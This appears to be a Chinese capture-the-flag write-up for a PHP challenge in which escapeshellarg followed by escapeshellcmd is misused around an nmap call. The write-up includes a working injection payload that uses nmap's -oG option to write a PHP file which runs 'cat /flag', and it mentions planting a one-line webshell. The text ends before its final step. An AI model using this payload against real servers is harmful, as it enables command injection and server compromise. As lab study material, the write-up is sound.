-
考察点: 1. **escapeshellarg和escapeshellcmd使用不当** 2. **namp -oG 1.php**可以写入一个文件 <?php if (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) { $_SERVER['REMOTE_ADDR'] = $_SERVER['HTTP_X_FORWARDED_FOR']; } if(!isset($_GET['host'])) { highlight_file(__FILE__); } else { $host = $_GET['host']; $host = escapeshellarg($host); $host = escapeshellcmd($host); $sandbox = md5("glzjin". $_SERVER['REMOTE_ADDR']); echo 'you are in sandbox '.$sandbox; @mkdir($sandbox); chdir($sandbox); echo system("nmap -T5 -sT -Pn --host-timeout 2 -F ".$host); }
@mkdir($sandbox);: 这一行使用 mkdir() 函数创建一个目录,目录的名称由 $sandbox 变量指定。@ 符号是 PHP 中的错误抑制符号,它会抑制可能出现的 mkdir() 函数调用产生的警告或错误信息,使得即使目录已存在或创建失败,也不会向用户显示错误信息。 chdir($sandbox);: 这一行使用 chdir() 函数改变当前工作目录为 $sandbox 变量指定的目录。这样做之后,任何后续的文件系统操作都将在新的工作目录中进行。
关于escapeshellarg函数和escapeshellcmd函数,简单来说就是前者会把传入的值当作字符串加单引号,然后对其自带的单引号加转义\ 处理,后者就会在一些符号前面加斜杠进行转义,但是对于单引号和双引号的解析只要有一个为单数才会转义(就是没有其他的与其配对)
示例如下:
而nmap的-oG选项可以写入一个函数,所以我们可以上传一句话然后直接连!,也可以直接cat flag
构造payload:
?host=' <?php echo `cat /flag`;?> -oG test.php '
带入目录路径得到: